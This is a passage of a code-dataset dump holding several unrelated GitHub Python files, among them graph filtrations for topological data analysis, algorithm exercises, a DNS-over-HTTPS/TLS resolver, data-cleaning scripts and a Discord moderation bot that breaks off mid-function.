\"dijkstra\":\n\t\treturn\n\telif filtration == \"cc\":\n\t\tgraphs = compute_cc(graphs)\n\telif filtration == \"degree\":\n\t\tgraphs = compute_degree(graphs)\n\telif filtration == \"ricciCurvature\":\n\t\tgraphs = compute_ricci(graphs)\n\telif filtration == \"fiedler\":\n\t\tgraphs = compute_fiedler(graphs)\n\telif filtration == \"geodesic\":\n\t\tgraphs = compute_geodesic(graphs)\n\telif filtration.startswith('hks_'):\n\t\tt = int(filtration[4:]) # don't want do deal with floats, makes dots in title...\n\t\tgraphs = compute_hks(graphs=graphs, t=t)\n\telse:\n\t\twarn(f\"Filtration {filtration} not implemented !\")\n\t\treturn\n\tset_graphs(graphs=graphs, labels=labels, dataset=dataset)\n\treturn\n\n\n\nclass Graph2SimplexTree(BaseEstimator,TransformerMixin):\n\t\"\"\"\n\tTransforms a list of networkx graphs into a list of simplextree multi\n\t\n\tUsual Filtrations\n\t-----------------\n\t- \"cc\" closeness centrality\n\t- \"geodesic\" if the graph provides data to compute it, e.g., BZR, COX2, PROTEINS\n\t- \"degree\" \n\t- \"ricciCurvature\" the ricci curvature\n\t- \"fiedler\" the square of the fiedler vector\n\t\"\"\"\n\tdef __init__(self, filtrations:Iterable[str]=[\"ricciCurvature\", \"cc\", \"degree\"], delayed=False, num_collapses=100, progress:bool=False):\n\t\tsuper().__init__()\n\t\tself.filtrations=filtrations # filtration to search in graph\n\t\tself.delayed = delayed # reverses the filtration #TODO\n\t\tself.num_collapses=num_collapses\n\t\tself.progress=progress\n\tdef fit(self, X, y=None):\n\t\treturn self\n\tdef transform(self,X:list[nx.Graph]):\n\t\tdef todo(graph, filtrations=self.filtrations) -> mp.SimplexTreeMulti: \n\t\t\tst = mp.SimplexTreeMulti(num_parameters=len(filtrations))\n\t\t\tnodes = np.asarray(graph.nodes, dtype=int).reshape(1,-1)\n\t\t\tnodes_filtrations = np.asarray([[graph.nodes[node][filtration] for filtration in filtrations] for node in graph.nodes], dtype=np.float32)\n\t\t\tst.insert_batch(nodes, nodes_filtrations)\n\t\t\tedges = np.asarray(graph.edges, dtype=int).T\n\t\t\tedges_filtrations = np.asarray([[graph[u][v][filtration] for filtration in filtrations] for u,v in graph.edges], dtype=np.float32)\n\t\t\tst.insert_batch(edges,edges_filtrations)\n\t\t\tif st.num_parameters == 2:\tst.collapse_edges(num=self.num_collapses) # TODO : wait for a filtration domination update\n\t\t\tst.make_filtration_non_decreasing() ## Ricci is not safe ...\n\t\t\treturn st\n\t\treturn [delayed(todo)(graph) for graph in X] if self.delayed else Parallel(n_jobs=-1, prefer=\"threads\")(delayed(todo)(graph) for graph in tqdm(X, desc=\"Computing simplextrees from graphs\", disable=not self.progress))","repo_name":"DavidLapous/multipers-signed-measure","sub_path":"multipers/data/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32067938358","text":"\n# MINIMUM INTERVAL PARTITIONING\n\n# ist Intervallmenge M kompatibel?\n# für jedes i,j mit i!=j in M muss gelten: \n# si >= fj oder sj >= fi \ndef compatible(L,M):\n for i in M:\n for j in M:\n if i != j:\n (si, fi) = L[i]\n (sj, fj) = L[j]\n if (not si >= fj) and (not sj >= fi):\n return False\n return True\n\n# Bsp\nL = [(0,3),(0,4),(4,6),(5,7),(8,10),(0,12),(9,13),(15,16),(14,17)]\n# print(compatible(L,{0,2,5}))\n# print(compatible(L,{0,3,4,7}))\n# print(compatible(L,{1,2}))\n# print(compatible(L,set()))\n\n\n\n\n# zulaessige Loesung:\n# - r ist stets total\n# - jede Intervallmenge pro Ressource ist kompatibel\ndef sol_min_intpart(L,r):\n m = len(L)\n R = [set() for _ in range(m)]\n\n for i in range(m):\n R[r(i)].add(i)\n\n for ressource in R:\n if not compatible(L, ressource):\n return False\n\n return True\n\n# Bewertungsfunktion:\n# - Kardinalitaet Wertebereich von r\ndef m_min_intpart(L,r):\n m = len(L)\n R = [set() for _ in range(m)]\n value = 0\n\n for i in range(m):\n R[r(i)].add(i)\n \n for ressource in R:\n if ressource != set():\n value += 1\n\n return value\n\n# Entwurfsmuster Exhaustive Search\nfrom itertools import product\n\n# gibt eine Funktion zurück, die jedes Intervall i einer \n# Ressource zuordnet\ndef def_r(t):\n def r(i):\n return t[i]\n return r\n\n \ndef min_intpart_exhaustive(L):\n m = len(L) \n opt = m\n r_opt = None\n\n # Erstelle alle möglichen Funktionen r und wähle diejenige\n # mit dem kleinsten Wertebereich\n for t in product([i for i in range(m)], repeat=m):\n r = def_r(t)\n if sol_min_intpart(L, r): # Falls Lösung zulässig (Intervalle in Ressourcen sind kompatibel)\n deg = m_min_intpart(L,r)\n if deg < opt: # Vergleiche Wertebereich von r mit Wertebereich der (bisher) optimalen Lösung\n opt = deg\n r_opt = r # optimale Funktion \n\n return opt\n\n\nprint(\"Optimale Anzahl an Ressourcen: \", min_intpart_exhaustive([(0,2),(1,3),(0,3),(2,4)]))\nprint(\"Optimale Anzahl an Ressourcen: \", min_intpart_exhaustive([(0,2),(0,3),(2,3),(3,4),(2,4),(4,7)]))\n\n\n\n","repo_name":"MMueller98/Algorithmen-Design-Python","sub_path":"Code/ueb/d/stub_aufg01_min_intpart_exh.py","file_name":"stub_aufg01_min_intpart_exh.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"657677229","text":"from collections import deque\n\ndi = [0, 0, 1, -1]\ndj = [1, -1, 0, 0]\n\n\ndef get_graph(v):\n n = len(v)\n m = len(v[0])\n graph = [[] for _ in range(n * m)]\n\n for i in range(n):\n for j in range(m):\n if v[i][j] == 0:\n continue\n for d in range(4):\n if 0 <= i + di[d] < n and 0 <= j + dj[d] < m and v[i + di[d]][j + dj[d]] != 0:\n graph[(i * m) + j].append((i + di[d]) * m + j + dj[d])\n\n return graph\n\n\ndef bfs(visited, graph, i):\n queue = deque([i])\n visited[i] = True\n result = 0\n\n while queue:\n curr = queue.popleft()\n result += 1\n for next in graph[curr]:\n if next != [-1] and not visited[next]:\n queue.append(next)\n visited[next] = True\n return result\n\n\ndef connected_component(graph, field):\n visited = [False] * len(graph)\n result = []\n\n for i in range(len(graph)):\n length = len(field[0])\n n_i = i // length\n n_j = i % length\n k = field[n_i][n_j]\n if visited[i] or k != 1:\n continue\n result.append(bfs(visited, graph, i))\n\n if len(result) == 0:\n return [0, 0]\n else:\n return [len(result), max(result)]\n\n\ndef solution(v):\n graph = get_graph(v)\n result = connected_component(graph, v)\n return result\n\nv = [[0]]\nprint(solution(v))","repo_name":"skfo763/Problem_Solving","sub_path":"test_job/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18432296081","text":"def bubbleSort(arr):\n n = len(arr)\n\n # 遍历所有数组元素\n for i in range(n):\n\n # Last i elements are already in place\n for j in range(0, n - i - 1):\n\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\narr = [64, 34, 25, 12, 22, 11, 90]\n\nbubbleSort(arr)\n\nprint(\"排序后的数组:\")\nfor i in range(len(arr)):\n print(\"%d\" % arr[i]),","repo_name":"liukanshan1/Notes","sub_path":"Python/冒泡排序.py","file_name":"冒泡排序.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"70860034474","text":"def history(name, episode):\n name, episode = name, episode\n\n with open('history.txt', 'a') as f:\n f.write(f'{name}-{episode}\\n')\n\n\ndef retrieve_history():\n\n with open('history.txt', 'r') as f:\n history = f.read().split()\n history = list(dict.fromkeys(history))\n\n for index, hist in enumerate(history):\n print(f'[{index+1}] {hist}')\n print(f'[q] Quit')\n\n while True:\n history_episode = input('> ')\n\n try:\n if history_episode == 'q':\n exit()\n elif int(history_episode) == 1:\n name = history[0]\n break\n elif int(history_episode) > 1:\n try:\n name = history[int(history_episode)-1]\n break\n except IndexError:\n print('Out of range...')\n except ValueError:\n print('Try \"q\" to quit')\n\n anime_name = name.replace('episode', '').replace('-', ' ').split()\n anime_epi = anime_name.pop()\n anime_name = ' '.join(anime_name)\n return anime_name, anime_epi\n","repo_name":"C0DE-SLAYER/CliAniVerse","sub_path":"CliAniVerse/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23083642324","text":"S = input()\nres = 0\nf = True\nN = len(S)\nfor i in range(0, N - 1, 2):\n opr = int(S[i])\n op = S[i + 1]\n if op == '+':\n res += int(opr > 0 and f)\n f = True\n else:\n f &= opr > 0\nres += int(int(S[N - 1]) > 0 and f)\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/Browns/python/ABC033-C-Sushiki_no_Kakikae.py","file_name":"ABC033-C-Sushiki_no_Kakikae.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71401670632","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nfrom logger import logger\n\nBase = declarative_base()\n\n\n\nclass Marksheet(Base):\n \"\"\"\n Marksheet of students\n \"\"\"\n try:\n __tablename__ = 'marksheet' # Name of the table\n roll_id = Column(Integer, primary_key=True, unique=True) # primary Key attribute\n name = Column(String)\n History = Column(Integer)\n Maths = Column(Integer)\n Science = Column(Integer)\n activity = relationship(\"Activities\", back_populates=\"marksheets\")\n except Exception as e:\n logger.exception(e)\n\n def __repr__(self):\n return \"\" \\\n .format(self.roll_id, self.name, self.History, self.Maths, self.Science)\n\n\nclass Activities(Base):\n \"\"\"\n Activities of students\n \"\"\"\n try:\n __tablename__ = 'activities'\n activity_id = Column(Integer, primary_key=True)\n roll_id = Column(Integer, ForeignKey('marksheet.roll_id')) # {, ondelete=\"CASCADE\"} can be used to cascade inside ForeignKey\n sports = Column(String)\n marksheets = relationship(\"Marksheet\", back_populates=\"activity\",order_by=Marksheet.roll_id)\n except Exception as e:\n logger.exception(e)\n\n def __repr__(self):\n return \"Activities(activity_id='{}', roll_id='{}', sports='{}')>\"\\\n .format((self.activity_id, self.roll_id, self.sports))\n","repo_name":"amitkrmaharana/Report_Card","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13229397785","text":"import concurrent.futures\nimport random\nimport time\n\nimport dns.dnssec\nimport dns.edns\nimport dns.flags\nimport dns.message\nimport dns.rdatatype\n\nimport encrypted_dns.outbound\n\n\nclass OutboundHandler:\n @staticmethod\n def get_group(query_name, domain_group, tag_group, rules=None):\n tag = encrypted_dns.utils.parse_domain_rules(domain_group, query_name, default='bootstrap')\n return tag_group[tag], tag_group[tag].get('concurrent', False)\n\n @staticmethod\n def random_outbound(outbounds):\n \"\"\"Get a random outbound from the list of outbounds specified in config.json.\n\n :param outbounds: List of outbounds.\n :return: Dictionary of outbound and type of outbound\n \"\"\"\n population = []\n for outbound in outbounds['dns']:\n population.append(outbound)\n return random.choice(population)\n\n @staticmethod\n def resolve_outbound_ip(outbound_address, bootstrap_dns_ip, hosts_dict):\n \"\"\"Resolve ip address of HTTPS or TLS outbound with bootstrap dns address.\n\n :param hosts_dict: Dict of hosts to resolve IP address.\n :param outbound_address: Domain name of HTTPS or TLS outbound\n :param bootstrap_dns_ip: DNS server for resolving 'outbound_address'\n :return: RRSet Answer of HTTPS or TLS outbound\n \"\"\"\n if outbound_address in hosts_dict:\n return hosts_dict[outbound_address]\n dns_query = dns.message.make_query(outbound_address, dns.rdatatype.A)\n response = dns.query.udp(dns_query, bootstrap_dns_ip)\n if response.answer:\n return response.answer[-1].items[0].to_text()\n\n\nclass WireMessageHandler:\n def __init__(self, outbounds, cache_object, ecs_ip_address, hosts, dnssec, firewall):\n self.cache = cache_object\n self.ecs_ip_address = ecs_ip_address\n self.hosts = hosts\n self.dnssec = dnssec\n self.firewall = firewall\n self.rate_per_second = [0, int(time.time())]\n\n # map protocol of outbound to the method for resolve\n self.protocol_methods = {\n 'udp': WireMessageHandler._udp_resolve,\n 'tcp': WireMessageHandler._tcp_resolve,\n 'tls': WireMessageHandler._tls_resolve,\n 'dot': WireMessageHandler._tls_resolve,\n 'https': WireMessageHandler._https_resolve,\n 'doh': WireMessageHandler._https_resolve,\n }\n\n self.tag_group = {} # tag to group dict\n self.domain_group = {} # domain to tag\n for dns_group in outbounds:\n self.tag_group[dns_group['tag']] = dns_group\n for domain in dns_group.get('domains', {}):\n self.domain_group[domain] = dns_group['tag']\n\n @staticmethod\n def edns_subnet_client(query_message, ip):\n \"\"\"Add edns subnet client option to query messages.\n\n :param query_message: DNS query message for processing.\n :param ip: IP Address to add as an option.\n :return: Processed DNS query message.\n \"\"\"\n if ip != '' and ip is not None:\n query_message.use_edns(0, 0, options=[dns.edns.ECSOption(ip)])\n\n def validate_dnssec(self, question_name, outbound, protocol):\n request = dns.message.make_query(question_name + '.', dns.rdatatype.DNSKEY, want_dnssec=True)\n response = self.protocol_methods[protocol].__call__(request, outbound)\n if response.rcode() != 0:\n return True\n\n name = dns.name.from_text(question_name + '.')\n answer = response.answer\n dns.dnssec.validate(answer[0], answer[1], {name: answer[0]})\n\n def handle_response(self, response):\n if not response:\n return None\n if self.cache:\n for answer in response.answer:\n self.cache.put(answer)\n return response.to_wire()\n\n def firewall_clearance(self, wire_message, client_ip):\n try:\n dns_message = dns.message.from_wire(wire_message)\n if client_ip in self.firewall['client_blacklist']:\n return False\n\n if self.firewall['rate_limit'] > -1:\n self.rate_per_second[0] += 1\n if int(time.time()) - self.rate_per_second[1] >= 1:\n self.rate_per_second = [0, int(time.time())]\n if self.firewall['rate_limit'] <= self.rate_per_second[0]:\n return False\n\n if self.firewall['refuse_ANY']:\n for q in dns_message.question:\n if q.rdtype == dns.rdatatype.ANY:\n return False\n\n if self.firewall['AAAA_disabled']:\n for q in dns_message.question:\n if q.rdtype == dns.rdatatype.AAAA:\n return False\n return True\n except Exception as exc:\n print(\"[Error]:\", exc)\n\n def wire_resolve(self, wire_message):\n \"\"\"Parse wire messages received by inbounds and forward them to corresponding outbounds.\n\n :param wire_message: DNS query message received by inbound.\n :return: DNS response to the query.\n \"\"\"\n \n try:\n dns_message = dns.message.from_wire(wire_message)\n message_flags = dns.flags.to_text(dns_message.flags)\n\n # raise an exception since 'wire_resolve' method should only process dns queries\n if 'QR' in message_flags:\n raise TypeError(\"DNS Resolver should only receive queries\")\n\n # retrieve cached rrset from cache\n question_rrset = dns_message.question[0]\n question_name = question_rrset.name.to_text().rstrip('.')\n if self.cache:\n cached_response_rrset, ttl = self.cache.get(question_rrset)\n if cached_response_rrset:\n dns_response = dns.message.make_response(dns_message)\n dns_response.answer.append(cached_response_rrset)\n return dns_response.to_wire()\n\n # check hosts\n hosts_record = encrypted_dns.utils.parse_domain_rules(self.hosts, question_name)\n if hosts_record:\n dns_response = dns.message.make_response(dns_message)\n if encrypted_dns.utils.is_valid_ipv4_address(hosts_record):\n hosts_rrset = dns.rrset.from_text(question_rrset.name, 300, dns.rdataclass.IN,\n dns.rdatatype.A, hosts_record)\n else:\n if not hosts_record.endswith('.'):\n hosts_record += '.'\n\n hosts_rrset = dns.rrset.from_text(question_rrset.name, 300, dns.rdataclass.IN,\n dns.rdatatype.CNAME, hosts_record)\n dns_response.answer.append(hosts_rrset)\n return dns_response.to_wire()\n\n # add ecs to query message\n self.edns_subnet_client(dns_message, self.ecs_ip_address)\n\n # list of outbounds in config.json\n outbound_group, is_concurrent = OutboundHandler.get_group(question_name, self.domain_group, self.tag_group)\n proxy = outbound_group.get('proxies', None)\n if is_concurrent:\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=10)\n result_pool = []\n for outbound in outbound_group['dns']:\n result_pool.append(executor.submit(self._resolve_thread, outbound, dns_message, question_name, proxy))\n \n first = concurrent.futures.wait(result_pool, timeout=60, return_when=concurrent.futures.FIRST_COMPLETED)\n dns_response = next(iter(first[0])).result()\n executor.shutdown()\n else:\n outbound = OutboundHandler.random_outbound(outbound_group)\n dns_response = self._resolve_thread(outbound, dns_message, question_name, proxy)\n\n return self.handle_response(dns_response)\n\n except dns.message.ShortHeader:\n print('[Error]: The DNS packet passed to from_wire() is too short')\n except dns.message.TrailingJunk:\n print('[Error]:The DNS packet passed to from_wire() has extra junk at the end of it')\n except dns.message.UnknownHeaderField:\n print('[Error]: The header field name was not recognized when converting from text into a message')\n except dns.message.BadEDNS:\n print('[Error]: An OPT record occurred somewhere other than the start of the additional data section')\n except dns.message.UnknownTSIGKey:\n print('[Error]: A TSIG with an unknown key was received')\n except dns.message.BadTSIG:\n print('[Error]: A TSIG record occurred somewhere other than the end of the additional data section')\n except dns.name.BadLabelType:\n print('[Error]: The label type in DNS name wire format is unknown')\n except dns.exception.Timeout:\n print('[Error]: The DNS operation timed out')\n except Exception as exc:\n print('[Error]:', exc)\n\n def _resolve_thread(self, outbound, dns_message, question_name, proxy):\n try:\n protocol, dns_address, port = encrypted_dns.utils.parse_dns_address(outbound)\n is_valid_ip_address = encrypted_dns.utils.is_valid_ipv4_address(dns_address)\n\n if protocol in ('https', 'tls', 'doh', 'dot') and not is_valid_ip_address:\n if 'bootstrap' in self.tag_group:\n bootstrap_dns_ip = self.tag_group['bootstrap']['dns'][0]\n else:\n bootstrap_dns_ip = '1.0.0.1'\n\n ip_address = OutboundHandler.resolve_outbound_ip(dns_address, bootstrap_dns_ip, self.hosts)\n outbound = {\n 'protocol': protocol,\n 'domain': dns_address,\n 'ip': ip_address,\n 'port': port,\n 'proxy': proxy\n }\n else:\n outbound = {\n 'protocol': protocol,\n 'ip': dns_address,\n 'port': port\n }\n\n dns_response = self.protocol_methods[protocol].__call__(dns_message, outbound)\n if self.dnssec and not self.validate_dnssec(question_name, outbound, protocol):\n return None\n return dns_response\n except Exception:\n raise\n\n @staticmethod\n def _udp_resolve(dns_message, outbound):\n udp = encrypted_dns.outbound.DatagramOutbound.from_dict(outbound)\n return udp.query(dns_message)\n\n @staticmethod\n def _tcp_resolve(dns_message, outbound):\n tcp = encrypted_dns.outbound.StreamOutbound.from_dict(outbound)\n return tcp.query(dns_message)\n\n @staticmethod\n def _https_resolve(dns_message, outbound):\n https = encrypted_dns.outbound.HTTPSOutbound.from_dict(outbound)\n return https.query(dns_message)\n\n @staticmethod\n def _tls_resolve(dns_message, outbound):\n tls = encrypted_dns.outbound.TLSOutbound.from_dict(outbound)\n return tls.query(dns_message)\n","repo_name":"dkdrcom5-gmail-com/Encrypted-DNS","sub_path":"encrypted_dns/resolve/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"341599721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 19 11:41:14 2021\n\n@author: jstei\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndef unique(list1):\n x=np.array(list1)\n return np.unique(x)\n\nDF=pd.read_csv('RawDF.csv')\nlabels=['Unnamed: 0','Unnamed: 0.1','jersey_number','reference']\nDF=DF.drop(labels, axis=1)\nDF.year=DF.year.astype('object')\nDF['team_changes']=0\nduplicates=[]\ndrop_index_values=[]\nfor a in range(len(DF)):\n name=DF.loc[a,'combined']\n values=DF[DF.combined==name].index.values\n values=[i for i in values]\n if len(values)>1:\n duplicates.append(name)\n drop_index_values.append(values)\n\nduplicates=unique(duplicates)\ndrop_index_values=[i for sublist in drop_index_values for i in sublist]\ndrop_index_values=unique(drop_index_values)\nkeys=[i for i in DF.columns]\ncolumns=dict.fromkeys(keys)\ndataframes=[]\nsum_columns=['games_played','games_started','offensive_rebounds','defensive_rebounds','tech_fouls','ejections','foulouts','double_doubles','triple_doubles']\nfor i in duplicates:\n data=[]\n values=DF[DF.combined==i].index.values\n values=[i for i in values]\n for column in columns:\n point=[]\n for value in values:\n point.append(DF.loc[value,column])\n if column==\"games_played\":\n weights=[]\n for i in range(len(point)):\n weights.append(point[i]/sum(point))\n data.append(sum(point))\n elif column=='team_changes':\n data.append(len(values))\n elif any(i==column for i in sum_columns):\n data.append(sum(point))\n else:\n if DF[column].dtype=='O':\n data.append(DF.loc[values[0],column])\n else:\n product=[]\n for num1,num2 in zip(weights,point):\n product.append(num1*num2)\n data.append(sum(product))\n result=dict(zip(columns,data))\n individualDF=pd.DataFrame(result,index=[0])\n dataframes.append(individualDF)\n\nDuplicateDF=pd.concat(dataframes,axis=0)\n\nDF=DF.drop(drop_index_values,axis=0)\nDuplicate_Free_DF=pd.concat([DF,DuplicateDF],axis=0)\nDF.year=DF.year.astype('int64')\nDuplicate_Free_DF.year=Duplicate_Free_DF.year.astype('int64')\nDuplicate_Free_DF.sort_values(by=['year'])\n\nDuplicateDF.to_csv('DuplicateDF.csv',index=None)\nDuplicate_Free_DF.to_csv('Duplicate_Free_DF.csv',index=None)\n \n\n\n\n\n\n\n\n# for a in range(len(DF)):\n# name=DF.loc[a,'id']\n# year=DF.loc[a,'year']\n# values=DF[DF.id==name].index.values\n# values=[i for i in values]\n# for i in values:\n# if DF.loc[i,'year']\n# if len(values)>1:\n# for i in range(len(values)-1):\n# if DF.loc[i,'year']==DF.loc[(i+1),'year']:\n# try:\n# values.pop(i)\n# except:\n# pass\n# if len(values)>1:\n# if DF.loc[values[0],'experience']!=DF.loc[values[1],'experience']:\n# continue\n# else:\n# for i in range(len(values)):\n# DF.loc[values[i],'experience']=float(DF.loc[a,'experience'])-i","repo_name":"jsteinfink914/Projects","sub_path":"NBA Salary Prediction/Data Cleaning/Experience_and_duplicates.py","file_name":"Experience_and_duplicates.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21063826328","text":"#!/usr/bin/env python3\nimport openpyxl\nfrom openpyxl.utils import cell, get_column_letter, column_index_from_string\nimport os\nimport glob\nfrom os import listdir\nfrom os.path import isfile, join\nimport pprint\n\nprint(f\"-- testing openpyxl version {openpyxl.__version__}\")\n\n# sheets_dir = 'sheets'\n# onlyfiles = [f for f in listdir('sheets') if isfile(join(mypath, f))]\n\nscript_path = os.path.realpath(__file__)\nscript_dir = os.path.dirname(script_path)\nxls_dir = os.path.join(script_dir, \"2022\")\n\n# every file that ends with '.xlsx' under \"sheets\" dir\n# https://stackoverflow.com/questions/18394147/how-to-do-a-recursive-sub-folder-search-and-return-files-in-a-list\nfiles = glob.glob(xls_dir + '/**/*.xlsx', recursive=True)\n\nentries = [\"S&O - AGV\", \"EVBS\", \"PIDXRAY\", \"R&D\", \"Overhead\", \"Public holiday\", \"Vacation (Holiday)\"]\ntotal1 = {}\nfor e in entries:\n print(e)\n total1[e] = 0\n\nprint(total1)\n\n# total = 0 # create dictionary for each entry\ndd = {}\n\nfor f in files:\n try:\n print(f)\n wb = openpyxl.load_workbook(f)\n sheet = wb[wb.sheetnames[0]]\n \n # print(sheet.min_row, sheet.max_row, sheet.min_column, sheet.max_column)\n # print(get_column_letter(sheet.min_column), get_column_letter(sheet.max_column)) \n field_start = get_column_letter(sheet.min_column) + str(sheet.min_row)\n field_end = get_column_letter(sheet.max_column) + str(sheet.max_row)\n # print(field_start, '--', field_end)\n # print(sheet['P1'].value)\n\n week_nr = None\n week_total = 0\n\n for rowOfCellObjects in sheet[field_start:field_end]:\n for cellObj in rowOfCellObjects:\n if cellObj.value is not None:\n for entry in entries:\n if cellObj.value == entry:\n coord_curr = cellObj.coordinate\n coord_next = coord_curr.replace(get_column_letter(cellObj.col_idx), get_column_letter(cellObj.col_idx+1))\n # print(coord_curr, coord_next, sheet[coord_next].value)\n # total += sheet[coord_next].value\n total1[entry] += sheet[coord_next].value\n week_total += sheet[coord_next].value\n elif str(cellObj.value).startswith(\"weeknr:\"):\n week_nr = [int(s) for s in str(cellObj.value).split() if s.isdigit()]\n week_nr = week_nr[0]\n\n print(f\"Week {week_nr}: {week_total}\")\n # dd[\"week\"+str(week_nr)] = week_total\n dd[week_nr] = week_total\n \n # for row in range(sheet.max_row):\n # for col in range(sheet.max_column):\n # val = \n\n\n \n except Exception as e:\n print(\"-----\")\n print(f)\n print(\"Error: \", e)\n print(\"######\")\n\npprint.pprint(dd)\n# print(f\"Total:{total}\")\nprint(total1)\n","repo_name":"miroslavradojevic/python-snippets","sub_path":"excel/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30144981276","text":"from oop1 import BankAccount\r\ndef main():\r\n start_bal = float(input(\"Nhập tài khoản bắt đầu của bạn: \"))\r\n #tạo đối tượng bank account\r\n savings = BankAccount(start_bal)\r\n #rút tiền\r\n pay = float(input(\"Bạn thực hiện gửi vào tài khoản số tiền: \"))\r\n savings.deposit(pay)\r\n ###\r\n cash = float(input(\"Bạn thực hiện rút tiền trong tài khoản với số tiền: \"))\r\n savings.withdraw(cash)\r\n ###\r\n print(\"Số tiền còn lại trong tài khoản bạn là: \", savings.get_balance())\r\n\r\nmain()\r\n\r\n","repo_name":"tradaviahe1982/Python_Basic_For_EveryOne","sub_path":"oop1_test.py","file_name":"oop1_test.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17723739494","text":"from inspect import EndOfBlock\r\nimport os\r\nimport discord\r\nfrom discord import member\r\nfrom discord import message\r\nfrom discord import embeds\r\nfrom discord import guild\r\nfrom discord import user\r\nfrom discord import client\r\nfrom discord.colour import Color\r\nfrom discord.enums import Status\r\nimport discord.ext.commands as commands\r\nfrom discord.ext.commands.core import has_permissions\r\nimport dotenv\r\nimport json\r\n\r\nintents = discord.Intents.default()\r\nintents.members = True\r\ndotenv.load_dotenv()\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents, help_command=None)\r\n\r\n\r\ndef read_blacklisted_words(filename='blacklistedWords.json'):\r\n data = []\r\n with open(filename, 'r') as f:\r\n data = json.loads(f.read()).get(\"blacklistedWords\", [])\r\n return data\r\n\r\n\r\ndef write_json(data, filename=\"blacklistedWords.json\"):\r\n with open(filename, \"w\") as f:\r\n json.dump(data, f, indent=4)\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n\r\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"servers as moderator\"))\r\n\r\n print(\"I am Online\")\r\n print(\"-----------------\")\r\n\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n await member.send(f\"Welcome to the server {member.mention}\")\r\n\r\n\r\n@bot.command(aliases=['c'])\r\n@commands.has_permissions(manage_messages=True)\r\nasync def clear(ctx, amount=2):\r\n await ctx.channel.purge(limit=amount+1)\r\n\r\n\r\n@bot.command(aliases=['k'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def kick(ctx, member: discord.Member, *, reason=\"No reason provided\"):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot kick yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role: # Check if the role is below the authors role\r\n await ctx.send(\"You can only kick users with a lower role!\")\r\n return\r\n await member.send(f\"You have been kicked from our Server {ctx.message.guild}, because of \"+reason)\r\n await ctx.send(f\"{member.mention} has been kicked from the server {ctx.guild.name}, Reason:\"+reason)\r\n await member.kick(reason=reason)\r\n\r\n\r\n@bot.command(aliases=['b'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def ban(ctx, member: discord.Member, *, reason=\"No reason provided\"):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot ban yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role: # Check if the role is below the authors role\r\n await ctx.send(\"You can only ban users with a lower role!\")\r\n return\r\n await member.send(f\"You have been banned from our Server {ctx.guild.name}, because of \"+reason)\r\n embed = discord.Embed(\r\n title=\"User Banned!\", description=f\"{member.mention} has been banned from the server {ctx.guild.name}, because of \"+reason)\r\n # await ctx.send(f\"{member.mention} has been banned from the server {ctx.guild.name}, because of \"+reason)\r\n await ctx.send(embed=embed)\r\n await member.ban(reason=reason)\r\n\r\n\r\n@bot.command(aliases=['ub'])\r\n@commands.has_permissions(ban_members=True)\r\nasync def unban(ctx, *, member):\r\n banned_users = await ctx.guild.bans()\r\n member_name, member_disc = member.split('#')\r\n\r\n for banned_entry in banned_users:\r\n user = banned_entry.user\r\n\r\n if(user.name, user.discriminator) == (member_name, member_disc):\r\n await ctx.guild.unban(user)\r\n # await ctx.send(member_name+\" has been unbanned!\")\r\n embed = discord.Embed(title=\"User Unbanned!\",\r\n description=member_name+\" has been unbanned!\")\r\n await ctx.send(embed=embed)\r\n return\r\n\r\n embed = discord.Embed(title=\"User Not Found\",\r\n description=f\"{member} was not found\")\r\n await ctx.send(embed=embed)\r\n # await ctx.send(member+\" was not found\")\r\n\r\n\r\n@bot.command(aliases=['m'])\r\n@commands.has_permissions(kick_members=True)\r\nasync def mute(ctx, member: discord.Member):\r\n if member == None or member == ctx.message.author:\r\n await ctx.channel.send(\"You cannot mute or unmute yourself\")\r\n return\r\n if member.top_role > ctx.author.top_role:\r\n await ctx.send(\"You can only mute users with a lower role!\")\r\n return\r\n muted_role = ctx.guild.get_role(900024798585954325)\r\n\r\n await 